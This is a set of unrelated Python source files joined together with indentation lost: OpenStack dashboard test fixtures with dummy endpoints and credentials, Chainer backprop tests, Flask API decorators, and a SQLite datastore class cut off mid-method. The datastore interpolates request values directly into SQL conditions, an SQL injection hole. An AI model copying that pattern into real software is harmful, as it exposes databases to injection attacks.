# Dummy service catalog with all service.
# All endpoint URLs should point to example.com.
# Try to keep them as accurate to real data as possible (ports, URIs, etc.)
SERVICE_CATALOG = [
{"type": "compute",
"name": "nova",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.nova.example.com:8774/v2",
"internalURL": "http://int.nova.example.com:8774/v2",
"publicURL": "http://public.nova.example.com:8774/v2"},
{"region": "RegionTwo",
"adminURL": "http://admin.nova2.example.com:8774/v2",
"internalURL": "http://int.nova2.example.com:8774/v2",
"publicURL": "http://public.nova2.example.com:8774/v2"}]},
{"type": "volume",
"name": "cinder",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.nova.example.com:8776/v1",
"internalURL": "http://int.nova.example.com:8776/v1",
"publicURL": "http://public.nova.example.com:8776/v1"},
{"region": "RegionTwo",
"adminURL": "http://admin.nova.example.com:8776/v1",
"internalURL": "http://int.nova.example.com:8776/v1",
"publicURL": "http://public.nova.example.com:8776/v1"}]},
{"type": "image",
"name": "glance",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.glance.example.com:9292/v1",
"internalURL": "http://int.glance.example.com:9292/v1",
"publicURL": "http://public.glance.example.com:9292/v1"}]},
{"type": "identity",
"name": "keystone",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.keystone.example.com:35357/v2.0",
"internalURL": "http://int.keystone.example.com:5000/v2.0",
"publicURL": "http://public.keystone.example.com:5000/v2.0"}]},
{"type": "object-store",
"name": "swift",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.swift.example.com:8080/",
"internalURL": "http://int.swift.example.com:8080/",
"publicURL": "http://public.swift.example.com:8080/"}]},
{"type": "network",
"name": "neutron",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.neutron.example.com:9696/",
"internalURL": "http://int.neutron.example.com:9696/",
"publicURL": "http://public.neutron.example.com:9696/"}]},
{"type": "ec2",
"name": "EC2 Service",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.nova.example.com:8773/services/Admin",
"publicURL": "http://public.nova.example.com:8773/services/Cloud",
"internalURL": "http://int.nova.example.com:8773/services/Cloud"}]},
{"type": "metering",
"name": "ceilometer",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.ceilometer.example.com:8777",
"publicURL": "http://public.ceilometer.example.com:8777",
"internalURL": "http://int.ceilometer.example.com:8777"}]},
{"type": "orchestration",
"name": "Heat",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.heat.example.com:8004/v1",
"publicURL": "http://public.heat.example.com:8004/v1",
"internalURL": "http://int.heat.example.com:8004/v1"}]},
{"type": "database",
"name": "Trove",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.trove.example.com:8779/v1.0",
"publicURL": "http://public.trove.example.com:8779/v1.0",
"internalURL": "http://int.trove.example.com:8779/v1.0"}]},
{"type": "auditlog",
"name": "Auditlog",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.auditlog.example.com:9090",
"publicURL": "http://public.auditlog.example.com:9090",
"internalURL": "http://int.auditlog.example.com:9090"}]}
]
def data(TEST):
# Make a deep copy of the catalog to avoid persisting side-effects
# when tests modify the catalog.
TEST.service_catalog = copy.deepcopy(SERVICE_CATALOG)
TEST.tokens = utils.TestDataContainer()
TEST.domains = utils.TestDataContainer()
TEST.users = utils.TestDataContainer()
TEST.groups = utils.TestDataContainer()
TEST.tenants = utils.TestDataContainer()
TEST.roles = utils.TestDataContainer()
TEST.ec2 = utils.TestDataContainer()
admin_role_dict = {'id': '1',
'name': 'admin'}
admin_role = roles.Role(roles.RoleManager, admin_role_dict)
member_role_dict = {'id': "2",
'name': settings.OPENSTACK_KEYSTONE_DEFAULT_ROLE}
member_role = roles.Role(roles.RoleManager, member_role_dict)
TEST.roles.add(admin_role, member_role)
TEST.roles.admin = admin_role
TEST.roles.member = member_role
domain_dict = {'id': "1",
'name': 'test_domain',
'description': "a test domain.",
'enabled': True}
domain_dict_2 = {'id': "2",
'name': 'disabled_domain',
'description': "a disabled test domain.",
'enabled': False}
domain = domains.Domain(domains.DomainManager, domain_dict)
disabled_domain = domains.Domain(domains.DomainManager, domain_dict_2)
TEST.domains.add(domain, disabled_domain)
TEST.domain = domain # Your "current" domain
user_dict = {'id': "1",
'name': 'test_user',
'email': 'test@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '1',
'enabled': True,
'domain_id': "1"}
user = users.User(None, user_dict)
user_dict = {'id': "2",
'name': 'user_two',
'email': 'two@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '1',
'enabled': True,
'domain_id': "1"}
user2 = users.User(None, user_dict)
user_dict = {'id': "3",
'name': 'user_three',
'email': 'three@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '1',
'enabled': True,
'domain_id': "1"}
user3 = users.User(None, user_dict)
user_dict = {'id': "4",
'name': 'user_four',
'email': 'four@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '2',
'enabled': True,
'domain_id': "2"}
user4 = users.User(None, user_dict)
user_dict = {'id': "5",
'name': 'user_five',
'email': None,
'password': 'password',
'token': 'test_token',
'project_id': '2',
'enabled': True,
'domain_id': "1"}
user5 = users.User(None, user_dict)
TEST.users.add(user, user2, user3, user4, user5)
TEST.user = user # Your "current" user
TEST.user.service_catalog = copy.deepcopy(SERVICE_CATALOG)
group_dict = {'id': "1",
'name': 'group_one',
'description': 'group one description',
'project_id': '1',
'domain_id': '1'}
group = groups.Group(groups.GroupManager(None), group_dict)
group_dict = {'id': "2",
'name': 'group_two',
'description': 'group two description',
'project_id': '1',
'domain_id': '1'}
group2 = groups.Group(groups.GroupManager(None), group_dict)
group_dict = {'id': "3",
'name': 'group_three',
'description': 'group three description',
'project_id': '1',
'domain_id': '1'}
group3 = groups.Group(groups.GroupManager(None), group_dict)
group_dict = {'id': "4",
'name': 'group_four',
'description': 'group four description',
'project_id': '2',
'domain_id': '2'}
group4 = groups.Group(groups.GroupManager(None), group_dict)
TEST.groups.add(group, group2, group3, group4)
tenant_dict = {'id': "1",
'name': 'test_tenant',
'description': "a test tenant.",
'enabled': True,
'domain_id': '1',
'domain_name': 'test_domain'}
tenant_dict_2 = {'id': "2",
'name': 'disabled_tenant',
'description': "a disabled test tenant.",
'enabled': False,
'domain_id': '2',
'domain_name': 'disabled_domain'}
tenant_dict_3 = {'id': "3",
'name': u'\u4e91\u89c4\u5219',
'description': "an unicode-named tenant.",
'enabled': True,
'domain_id': '2',
'domain_name': 'disabled_domain'}
tenant = tenants.Tenant(tenants.TenantManager, tenant_dict)
disabled_tenant = tenants.Tenant(tenants.TenantManager, tenant_dict_2)
tenant_unicode = tenants.Tenant(tenants.TenantManager, tenant_dict_3)
TEST.tenants.add(tenant, disabled_tenant, tenant_unicode)
TEST.tenant = tenant # Your "current" tenant
tomorrow = datetime_safe.datetime.now() + timedelta(days=1)
expiration = tomorrow.isoformat()
scoped_token_dict = {
'access': {
'token': {
'id': "test_token_id",
'expires': expiration,
'tenant': tenant_dict,
'tenants': [tenant_dict]},
'user': {
'id': "test_user_id",
'name': "test_user",
'roles': [member_role_dict]},
'serviceCatalog': TEST.service_catalog
}
}
scoped_access_info = access.AccessInfo.factory(resp=None,
body=scoped_token_dict)
unscoped_token_dict = {
'access': {
'token': {
'id': "test_token_id",
'expires': expiration},
'user': {
'id': "test_user_id",
'name': "test_user",
'roles': [member_role_dict]},
'serviceCatalog': TEST.service_catalog
}
}
unscoped_access_info = access.AccessInfo.factory(resp=None,
body=unscoped_token_dict)
scoped_token = auth_user.Token(scoped_access_info)
unscoped_token = auth_user.Token(unscoped_access_info)
TEST.tokens.add(scoped_token, unscoped_token)
TEST.token = scoped_token # your "current" token.
TEST.tokens.scoped_token = scoped_token
TEST.tokens.unscoped_token = unscoped_token
access_secret = ec2.EC2(ec2.CredentialsManager, {"access": "access",
"secret": "secret"})
TEST.ec2.add(access_secret)
| |
import unittest
import numpy
import chainer
from chainer import testing
import chainer.testing.backend
import chainerx
def _get_expected_xp(backend_config, is_function):
# Returns a pair of xp's expected in forward() and backward() respectively.
xp = backend_config.xp
if xp is chainerx:
forward_xp = backend_config.device.fallback_device.xp
else:
forward_xp = xp
if is_function:
# chainer.Function
backward_xp = forward_xp
else:
# chainer.FunctionNode
backward_xp = xp
return forward_xp, backward_xp
@testing.parameterize(*testing.product({
'function_node': [True, False],
}))
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
{'use_cuda': True, 'cuda_device': 1},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
])
class TestFunctionBackprop(unittest.TestCase):
def call_func_function(self, backend_config, x1, x2, x3):
forward_xp, backward_xp = _get_expected_xp(backend_config, True)
class Func(chainer.Function):
def __init__(self):
self.array_init = backend_config.device.send(
numpy.array([3], numpy.float32))
def forward(self, inputs):
# Inputs
assert isinstance(inputs, tuple)
# x1, x3: float32
# x2: int32
x1, x2, x3 = inputs
assert isinstance(x1, forward_xp.ndarray)
assert isinstance(x2, forward_xp.ndarray)
assert isinstance(x3, forward_xp.ndarray)
# attribute fallback
assert isinstance(self.array_init, forward_xp.ndarray)
self.array_forward = forward_xp.array([2], numpy.float32)
assert isinstance(self.array_forward, forward_xp.ndarray)
y1 = x2 - 1 # int32
y2 = x1 * x3 + x2.astype(x1.dtype)
y3 = x1 + x3
self.retain_inputs((0, 2))
self.retain_outputs((0, 1,))
return y1, y2, y3
def backward(self, inputs, grad_outputs):
# Retained inputs
assert isinstance(inputs, tuple)
x1, x2, x3 = inputs
assert isinstance(x1, backward_xp.ndarray)
assert x2 is None # not retained
assert isinstance(x3, backward_xp.ndarray)
# Output gradients
assert isinstance(grad_outputs, tuple)
gy1, gy2, gy3 = grad_outputs
assert gy1 is None # y1 is int32
# y3 is disconnected
# TODO(niboshi): Expression after "or" is workaround for
# chainerx. ChainerX backward should return None for
# disconnected output and this workaround should be removed.
assert (gy3 is None
or (float(gy3.max()) == 0
and float((-gy3).max()) == 0))
# Retained outputs
output_data = self.output_data
assert isinstance(output_data, tuple)
y1, y2, y3 = output_data
assert isinstance(y1, backward_xp.ndarray)
assert isinstance(y2, backward_xp.ndarray)
assert y3 is None
# attribute fallback
assert isinstance(self.array_init, backward_xp.ndarray)
assert isinstance(self.array_forward, backward_xp.ndarray)
self.array_backward = backward_xp.array([4], numpy.float32)
assert isinstance(self.array_backward, backward_xp.ndarray)
gx1 = x3 * gy2 # + gy3
gx2 = None
gx3 = x1 * gy2 # + gy3
return gx1, gx2, gx3
return Func()(x1, x2, x3)
def call_func_function_node(self, backend_config, x1, x2, x3):
forward_xp, backward_xp = _get_expected_xp(backend_config, False)
class Func(chainer.FunctionNode):
def __init__(self):
self.array_init = backend_config.device.send(
numpy.array([3], numpy.float32))
def forward(self, inputs):
# Inputs
# x1, x3: float32
# x2: int32
x1, x2, x3 = inputs
assert isinstance(x1, forward_xp.ndarray)
assert isinstance(x2, forward_xp.ndarray)
assert isinstance(x3, forward_xp.ndarray)
# attribute fallback
assert isinstance(self.array_init, forward_xp.ndarray)
self.array_forward = forward_xp.array([2], numpy.float32)
assert isinstance(self.array_forward, forward_xp.ndarray)
y1 = x2 - 1 # int32
y2 = x1 * x3 + x2.astype(x1.dtype)
y3 = x1 + x3
self.retain_inputs((0, 2))
self.retain_outputs((0, 1,))
return y1, y2, y3
def backward(self, input_indexes, grad_outputs):
# Input indexes
assert isinstance(input_indexes, tuple)
assert input_indexes == (0, 2)
# Retained inputs
retained_inputs = self.get_retained_inputs()
assert isinstance(retained_inputs, tuple)
x1, x3 = retained_inputs
assert isinstance(x1.array, backward_xp.ndarray)
assert isinstance(x3.array, backward_xp.ndarray)
# Output gradients
assert isinstance(grad_outputs, tuple)
gy1, gy2, gy3 = grad_outputs
assert gy1 is None # y1 is int32
assert isinstance(gy2.array, backward_xp.ndarray)
# y3 is disconnected
# TODO(niboshi): Expression after "or" is workaround for
# chainerx. ChainerX backward should return None for
# disconnected output and this workaround should be removed.
assert (gy3 is None
or (float(gy3.array.max()) == 0
and float((-gy3.array).max()) == 0))
# Retained outputs
retained_outputs = self.get_retained_outputs()
assert isinstance(retained_outputs, tuple)
y1, y2, = retained_outputs
assert isinstance(y1.array, backward_xp.ndarray)
assert isinstance(y2.array, backward_xp.ndarray)
# attribute fallback
assert isinstance(self.array_init, backward_xp.ndarray)
assert isinstance(self.array_forward, backward_xp.ndarray)
self.array_backward = backward_xp.array([4], numpy.float32)
assert isinstance(self.array_backward, backward_xp.ndarray)
gx1 = x3 * gy2 # + gy3
gx2 = None
gx3 = x1 * gy2 # + gy3
return gx1, gx2, gx3
return Func().apply((x1, x2, x3))
def call_func(self, backend_config, x1, x2, x3):
if self.function_node:
return self.call_func_function_node(backend_config, x1, x2, x3)
else:
return self.call_func_function(backend_config, x1, x2, x3)
def test_backprop(self, backend_config):
x1_arr = numpy.array([2, 3], numpy.float32)
x2_arr = numpy.array([3, 1], numpy.int32)
x3_arr = numpy.array([5, 2], numpy.float32)
gy2_arr = numpy.array([2, 4], numpy.float32)
x1_arr, x2_arr, x3_arr, gy2_arr = backend_config.get_array(
(x1_arr, x2_arr, x3_arr, gy2_arr))
x1 = chainer.Variable(x1_arr)
x2 = chainer.Variable(x2_arr, requires_grad=False)
x3 = chainer.Variable(x3_arr)
# Forward
y1, y2, y3 = self.call_func(backend_config, x1, x2, x3)
assert isinstance(y1.array, backend_config.xp.ndarray)
assert isinstance(y2.array, backend_config.xp.ndarray)
assert isinstance(y3.array, backend_config.xp.ndarray)
# Backward
y2.grad = gy2_arr
y2.backward()
assert isinstance(x1.grad, backend_config.xp.ndarray)
assert x2.grad is None
assert isinstance(x3.grad, backend_config.xp.ndarray)
@testing.parameterize(*testing.product({
'function_node': [True, False],
}))
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
{'use_cuda': True, 'cuda_device': 1},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
])
class TestFunctionInputNone(unittest.TestCase):
def call_func_function(self, backend_config, x2):
forward_xp, backward_xp = _get_expected_xp(backend_config, True)
class Func(chainer.Function):
def forward(self, inputs):
# Inputs
assert isinstance(inputs, tuple)
x1, x2, x3 = inputs
assert x1 is None
assert isinstance(x2, forward_xp.ndarray)
assert x3 is None
y1 = x2 * 3
self.retain_inputs((1, 2))
self.retain_outputs(())
return y1,
def backward(self, inputs, grad_outputs):
# Retained inputs
assert isinstance(inputs, tuple)
x1, x2, x3 = inputs
assert x1 is None
assert isinstance(x2, backward_xp.ndarray)
assert x3 is None
# Output gradients
assert isinstance(grad_outputs, tuple)
gy1, = grad_outputs
assert isinstance(gy1, backward_xp.ndarray)
# Retained outputs
output_data = self.output_data
assert isinstance(output_data, tuple)
y1, = output_data
assert y1 is None
gx2 = 3 * gy1
return None, gx2, None
return Func()(None, x2, None),
def call_func_function_node(self, backend_config, x2):
forward_xp, backward_xp = _get_expected_xp(backend_config, False)
class Func(chainer.FunctionNode):
def forward(self, inputs):
# Inputs
x1, x2, x3 = inputs
assert x1 is None
assert isinstance(x2, forward_xp.ndarray)
assert x3 is None
y1 = x2 * 3
self.retain_inputs((1, 2))
self.retain_outputs(())
return y1,
def backward(self, input_indexes, grad_outputs):
# Input indexes
assert isinstance(input_indexes, tuple)
assert input_indexes == (1,)
# Retained inputs
retained_inputs = self.get_retained_inputs()
assert isinstance(retained_inputs, tuple)
x2, x3 = retained_inputs
assert isinstance(x2.array, backward_xp.ndarray)
assert x3 is None
# Output grads
assert isinstance(grad_outputs, tuple)
gy1, = grad_outputs
assert isinstance(gy1.array, backward_xp.ndarray)
# Retained outputs
retained_outputs = self.get_retained_outputs()
assert retained_outputs is ()
gx2 = 3 * gy1
return None, gx2, None
return Func().apply((None, x2, None))
def call_func(self, backend_config, x1):
if self.function_node:
return self.call_func_function_node(backend_config, x1)
else:
return self.call_func_function(backend_config, x1)
def test_backprop(self, backend_config):
x2_arr = numpy.array([2, 3], numpy.float32)
gy1_arr = numpy.array([2, 4], numpy.float32)
x2_arr, gy1_arr = backend_config.get_array((x2_arr, gy1_arr))
x2 = chainer.Variable(x2_arr, requires_grad=True)
# Forward
y1, = self.call_func(backend_config, x2)
assert isinstance(y1.array, backend_config.xp.ndarray)
# Backward
y1.grad = gy1_arr
y1.backward()
assert isinstance(x2.grad, backend_config.xp.ndarray)
@testing.parameterize(*testing.product({
'function_node': [True, False],
}))
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
{'use_cuda': True, 'cuda_device': 1},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
])
class TestFunctionOutputNone(unittest.TestCase):
def call_func_function(self, backend_config, x1):
forward_xp, backward_xp = _get_expected_xp(backend_config, True)
class Func(chainer.Function):
def forward(self, inputs):
# Inputs
assert isinstance(inputs, tuple)
x1, = inputs
assert isinstance(x1, forward_xp.ndarray)
y2 = x1 * 3 + 2
self.retain_inputs(())
self.retain_outputs((1, 2,))
return None, y2, None
def backward(self, inputs, grad_outputs):
# Retained inputs
assert isinstance(inputs, tuple)
x1, = inputs
assert x1 is None
# Output gradients
assert isinstance(grad_outputs, tuple)
gy1, gy2, gy3 = grad_outputs
assert gy1 is None
assert isinstance(gy2, backward_xp.ndarray)
assert gy3 is None
# Retained outputs
output_data = self.output_data
assert isinstance(output_data, tuple)
assert len(output_data) == 3
y1, y2, y3 = output_data
assert y1 is None
assert isinstance(y2, backward_xp.ndarray)
assert y3 is None
gx1 = 3 * gy2
return gx1,
return Func()(x1)
def call_func_function_node(self, backend_config, x1):
forward_xp, backward_xp = _get_expected_xp(backend_config, False)
class Func(chainer.FunctionNode):
def forward(self, inputs):
# Inputs
x1, = inputs
assert isinstance(x1, forward_xp.ndarray)
y2 = x1 * 3 + 2
self.retain_outputs((1, 2))
return None, y2, None
def backward(self, input_indexes, grad_outputs):
# Input indexes
assert isinstance(input_indexes, tuple)
assert input_indexes == (0,)
# Retained inputs
retained_inputs = self.get_retained_inputs()
assert isinstance(retained_inputs, tuple)
assert retained_inputs == ()
# Output grads
assert isinstance(grad_outputs, tuple)
gy1, gy2, gy3 = grad_outputs
assert gy1 is None
assert isinstance(gy2.array, backward_xp.ndarray)
assert gy3 is None
# Retained outputs
retained_outputs = self.get_retained_outputs()
assert isinstance(retained_outputs, tuple)
y2, y3 = retained_outputs
assert y3 is None
assert isinstance(y2.array, backward_xp.ndarray)
gx1 = 3 * gy2
return gx1,
return Func().apply((x1,))
def call_func(self, backend_config, x1):
if self.function_node:
return self.call_func_function_node(backend_config, x1)
else:
return self.call_func_function(backend_config, x1)
def test_backprop(self, backend_config):
x1_arr = numpy.array([2, 3], numpy.float32)
gy2_arr = numpy.array([2, 4], numpy.float32)
x1_arr, gy2_arr = backend_config.get_array((x1_arr, gy2_arr))
x1 = chainer.Variable(x1_arr, requires_grad=True)
# Forward
y1, y2, y3 = self.call_func(backend_config, x1)
assert y1.array is None
assert isinstance(y2.array, backend_config.xp.ndarray)
assert y3.array is None
# Backward
y2.grad = gy2_arr
y2.backward()
assert isinstance(x1.grad, backend_config.xp.ndarray)
testing.run_module(__name__, __file__)
| |
"""
Copyright (c) 2014 Miguel Grinberg
Copyright (c) 2015 Alexandru Ciobanu
"""
from datetime import timedelta
import functools
from time import time
from threading import Thread
from werkzeug.wrappers import Response
from flask import jsonify, url_for, request, make_response, current_app
from flask import g, abort
from flask_login import current_user
from app.models import Permission
def json_response(f):
"""A decorator without arguments
:param func f:
:return:
:rtype: func
"""
@functools.wraps(f)
def wrapped(*args, **kwargs):
current_app.log.warn('Using the json_response decorator is deprecated.'
'Please use app.core.ApiResponse.')
# invoke the wrapped function
rv = f(*args, **kwargs)
# wrapped function is a redirect
# return it without doing anything
if isinstance(rv, Response):
return rv
# the wrapped function can return the dictionary alone,
# or can also include a status code and/or headers.
# here we separate all these items
status_or_headers = None
headers = None
if isinstance(rv, tuple):
rv, status_or_headers, headers = rv + (None, ) * (3 - len(rv))
if isinstance(status_or_headers, (dict, list)):
headers, status_or_headers = status_or_headers, None
# if the response was a database model, then convert it to a
# dictionary
if not isinstance(rv, dict):
rv = rv.serialize()
# generate the JSON response
rv = jsonify(rv)
if status_or_headers is not None:
rv.status_code = status_or_headers
if headers is not None:
rv.headers.extend(headers)
return rv
return wrapped
def paginate(f=None, *, max_per_page=20, headers_prefix='DO-'):
"""Pagination decorator.
Generate a paginated response for a resource collection.
Routes that use this decorator must return a SQLAlchemy query as a
response.
:param f: function to be decorated
:param max_per_page: Items per page
:param headers_prefix: Prefix for custom headers
:return: tuple as (response, headers)
"""
if f is None:
return functools.partial(paginate,
max_per_page=max_per_page,
headers_prefix=headers_prefix)
@functools.wraps(f)
def wrapped(*args, **kwargs):
page = request.args.get('page', 1, type=int)
per_page = min(request.args.get('per_page', max_per_page,
type=int), max_per_page)
query = f(*args, **kwargs)
p = query.paginate(page, per_page)
rv = {'page': page, 'per_page': per_page, 'count': p.total}
if p.has_prev:
rv['prev'] = url_for(request.endpoint, page=p.prev_num,
per_page=per_page,
_external=True, **kwargs)
else:
rv['prev'] = None
if p.has_next:
rv['next'] = url_for(request.endpoint, page=p.next_num,
per_page=per_page,
_external=True, **kwargs)
else:
rv['next'] = None
rv['first'] = url_for(request.endpoint, page=1,
per_page=per_page, _external=True,
**kwargs)
rv['last'] = url_for(request.endpoint, page=p.pages,
per_page=per_page, _external=True,
**kwargs)
rv['items'] = [item.serialize() for item in p.items]
headers = {
headers_prefix + 'Page-Current': page,
headers_prefix + 'Page-Prev': rv['prev'],
headers_prefix + 'Page-Next': rv['next'],
headers_prefix + 'Page-Item-Count': rv['count']
}
return rv, headers
return wrapped
def async(f):
def wrapper(*args, **kwargs):
t = Thread(target=f, args=args, kwargs=kwargs)
t.start()
return wrapper
_limiter = None
class MemRateLimit(object):
"""Rate limiter that uses a Python dictionary as storage."""
def __init__(self):
self.counters = {}
def is_allowed(self, key, limit, period):
"""Check if the client's request should be allowed, based on the
hit counter. Returns a 3-element tuple with a True/False result,
the number of remaining hits in the period, and the time the
counter resets for the next period.
:param period:
:param limit:
:param key:
"""
now = int(time())
begin_period = now // period * period
end_period = begin_period + period
self.cleanup(now)
if key in self.counters:
self.counters[key]['hits'] += 1
else:
self.counters[key] = {'hits': 1, 'reset': end_period}
allow = True
remaining = limit - self.counters[key]['hits']
if remaining < 0:
remaining = 0
allow = False
return allow, remaining, self.counters[key]['reset']
def cleanup(self, now):
"""Eliminate expired keys."""
for key, value in list(self.counters.items()):
if value['reset'] < now:
del self.counters[key]
def rate_limit(limit, period):
"""Limits the rate at which clients can send requests to 'limit' requests
per 'period' seconds. Once a client goes over the limit all requests are
answered with a status code 429 Too Many Requests for the remaining of
that period.
:param period:
:param limit:
"""
def decorator(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
# initialize the rate limiter the first time here
global _limiter
if _limiter is None:
_limiter = MemRateLimit()
# generate a unique key to represent the decorated function and
# the IP address of the client. Rate limiting counters are
# maintained on each unique key.
key = '{0}/{1}'.format(f.__name__, request.remote_addr)
allowed, remaining, reset = _limiter.is_allowed(key, limit,
period)
# set the rate limit headers in g, so that they are picked up
# by the after_request handler and attached to the response
g.headers = {
'DO-RateLimit-Remaining': str(remaining),
'DO-RateLimit-Limit': str(limit),
'DO-RateLimit-Reset': str(reset)
}
# if the client went over the limit respond with a 429 status
# code, else invoke the wrapped function
if not allowed:
response = jsonify(
{'status': 429, 'error': 'too many requests',
'message': 'You have exceeded your request rate'})
response.status_code = 429
return response
# else we let the request through
return f(*args, **kwargs)
return wrapped
return decorator
def api_deprecated(new_endpoint, message='This endpoint is deprecated.'):
"""Decorator that adds a deprecation message for and endpoint.
Decorated function will not be executed.
:param new_endpoint: New endpoint to use
:param message: Warning message
:return:
:rtype: func
"""
def decorator(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
response = jsonify({
'message': message,
'endpoint': url_for(new_endpoint, _external=True)
})
# response = jsonify(rv)
response.status_code = 301
response.headers['DO-New-Endpoint'] = \
url_for(new_endpoint, _external=True)
return response
return wrapped
return decorator
def permission_required(permission):
def decorator(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not current_user.can(permission):
abort(403)
return f(*args, **kwargs)
return wrapped
return decorator
def admin_required(f):
return permission_required(Permission.ADMINISTER)(f)
def needs_admin(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
admin_id = g.user.is_admin
if not admin_id:
abort(403)
return f(*args, **kwargs)
return wrapped
def crossdomain(origin=None, methods=None, headers=None,
max_age=21600, attach_to_all=True,
automatic_options=True):
"""Add CORS headers to response. Courtesy of Armin Ronacher.
.. note::
This is used only for localhost development. In production we use a
reverse proxy.
:param origin:
:param methods:
:param headers:
:param max_age:
:param attach_to_all:
:param automatic_options:
:return:
"""
if headers is None:
headers = 'Content-Type, Accept, Authorization, Origin'
if methods is not None:
methods = ', '.join(sorted(x.upper() for x in methods))
if headers is not None and not isinstance(headers, str):
headers = ', '.join(x.upper() for x in headers)
if not isinstance(origin, str):
origin = ', '.join(origin)
if isinstance(max_age, timedelta):
max_age = max_age.total_seconds()
def get_methods():
if methods is not None:
return methods
options_resp = current_app.make_default_options_response()
return options_resp.headers['allow']
def decorator(f):
def wrapped_function(*args, **kwargs):
if automatic_options and request.method == 'OPTIONS':
resp = current_app.make_default_options_response()
else:
resp = make_response(f(*args, **kwargs))
if not attach_to_all and request.method != 'OPTIONS':
return resp
h = resp.headers
h['Access-Control-Allow-Origin'] = origin
h['Access-Control-Allow-Methods'] = get_methods()
h['Access-Control-Max-Age'] = str(max_age)
h['Access-Control-Allow-Credentials'] = 'true'
if headers is not None:
h['Access-Control-Allow-Headers'] = headers
h['Access-Control-Expose-Headers'] = headers
return resp
f.provide_automatic_options = False
return functools.update_wrapper(wrapped_function, f)
return decorator
| |
"""
Implement some datastore based on SQL databases
"""
import sqlite3
from werkzeug.exceptions import NotFound, BadRequest
from .base import DataStore
from rest_api_framework.models import PkField
class SQLiteDataStore(DataStore):
"""
Define a sqlite datastore for your ressource. you have to give
__init__ a data parameter containing the information to connect to
the database and to the table.
example:
.. code-block:: python
data={"table": "tweets",
"name": "test.db"}
model = ApiModel
datastore = SQLiteDataStore(data, **options)
SQLiteDataStore implement a naive wrapper to convert Field
types into database type.
* int will be saved in the database as INTEGER
* float will be saved in the database as REAL
* basestring will be saved in the database as TEXT
* if the Field type is PKField, is a will be saved as
PRIMARY KEY AUTOINCREMENT
As soon as the datastore is instanciated, the database is create
if it does not exists and table is created too
.. note::
- It is not possible to use :memory database either.
The connection is closed after each operations
"""
wrapper = {"integer": "integer",
"float": "real",
"string": "text"
}
def __init__(self, ressource_config, model, **options):
self.db = ressource_config["name"]
self.conn = sqlite3.connect(ressource_config["name"],
check_same_thread=False)
cursor = self.conn.cursor()
table = ressource_config["table"]
super(SQLiteDataStore, self).__init__(
{"conn": self.conn, "table": table},
model,
**options)
self.create_database(cursor, table)
self.conn.commit()
# conn.close()
self.fields = self.model.get_fields()
def create_database(self, cursor, table):
statement = []
for field in self.model.get_fields():
query = "{0} {1}".format(field.name, self.wrapper[field.base_type])
if isinstance(field, PkField):
query += " primary key"
if field.base_type == "integer":
query += " autoincrement"
statement.append(query)
if "required" in field.options\
and field.options['required'] is True:
query += " NOT NULL"
fields = ", ".join(statement)
for field in self.model.get_fields():
if "foreign" in field.options:
fields += ",FOREIGN KEY ({0}) REFERENCES {1}({2})".format(
field.name, field.options["foreign"]["table"],
field.options["foreign"]["column"]
)
sql = 'create table if not exists {0} ({1})'.format(table, fields)
cursor.execute(sql)
def get_connector(self):
"""
return a sqlite3 connection to communicate with the table
define in self.db
"""
self.conn.execute('pragma foreign_keys=on')
return self.conn
def filter(self, **kwargs):
"""
Change kwargs["query"] with "WHERE X=Y statements". The
filtering will be done with the actual evaluation of the query
in :meth:`~.SQLiteDataStore.paginate` the sql can then be lazy
"""
kwargs['query'] += ' FROM {0}'
return kwargs
def count(self, **data):
cdt = self.build_conditions(data)
if len(cdt) == 0:
query = "SELECT COUNT (*) FROM {0}".format(
self.ressource_config['table'])
else:
cdt = " AND ".join(cdt)
query = "SELECT COUNT (*) FROM {0} WHERE {1}".format(
self.ressource_config['table'],
cdt
)
cursor = self.get_connector().cursor()
cursor.execute(query)
return cursor.fetchone()[0]
def build_conditions(self, data):
return [
["{0}='{1}'".format(
e[0], e[1]) for e in condition.iteritems()
][0] for condition in self.get_conditions(data)]
def get_conditions(self, data):
rm = []
for elem in data:
if elem not in ['query', 'fields']:
if elem not in self.model.get_fields_name():
rm.append(elem)
for elem in rm:
data.pop(elem)
return [
{k: v} for k, v in data.iteritems() if k not in ["query", "fields"]
]
def paginate(self, data, **kwargs):
"""
paginate the result of filter using ids limits. Obviously, to
work properly, you have to set the start to the last ids you
receive from the last call on this method. The max number of
row this method can give back depend on the paginate_by option.
"""
where_query = self.build_conditions(data)
args = []
limit = kwargs.pop("end", None)
if kwargs.get("start", None):
where_query.append(" id >=?")
args.append(kwargs.pop('start'))
